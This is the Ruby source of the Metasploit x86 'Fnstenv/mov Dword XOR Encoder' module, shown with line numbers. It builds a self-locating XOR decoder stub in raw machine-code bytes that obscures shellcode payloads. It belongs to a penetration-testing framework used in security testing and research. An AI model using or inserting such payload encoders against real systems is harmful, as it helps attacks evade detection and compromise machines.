1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Encoder::Xor
7

8
  def initialize
9
    super(
10
      'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder',
11
      'Description' => %q{
12
        This encoder uses a variable-length mov equivalent instruction
13
        with fnstenv for getip.
14
      },
15
      'Author' => 'spoonm',
16
      'Arch' => ARCH_X86,
17
      'License' => MSF_LICENSE,
18
      'Decoder' => {
19
        'KeySize' => 4,
20
        'BlockSize' => 4
21
      })
22
  end
23

24
  #
25
  # Returns the decoder stub that is adjusted for the size of the buffer
26
  # being encoded.
27
  #
28
  def decoder_stub(state)
29
    # Sanity check that saved_registers doesn't overlap with modified_registers
30
    if !(modified_registers & saved_registers).empty?
31
      raise BadGenerateError
32
    end
33

34
    decoder =
35
      Rex::Arch::X86.set(
36
        Rex::Arch::X86::ECX,
37
        (((state.buf.length - 1) / 4) + 1),
38
        state.badchars
39
      ) +
40
      "\xd9\xee" +              # fldz
41
      "\xd9\x74\x24\xf4" +      # fnstenv [esp - 12]
42
      "\x5b" +                  # pop ebx
43
      "\x81\x73\x13XORK" +      # xor_xor: xor DWORD [ebx + 22], xorkey
44
      "\x83\xeb\xfc" +          # sub ebx,-4
45
      "\xe2\xf4"                # loop xor_xor
46

47
    state.decoder_key_offset = decoder.index('XORK')
48

49
    return decoder
50
  end
51

52
  # Indicate that this module can preserve some registers
53
  def can_preserve_registers?
54
    true
55
  end
56

57
  # A list of registers always touched by this encoder
58
  def modified_registers
59
    [ Rex::Arch::X86::EBX, Rex::Arch::X86::ECX ]
60
  end
61

62
  # Convert the SaveRegisters to an array of x86 register constants
63
  def saved_registers
64
    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
65
  end
66
end
67

68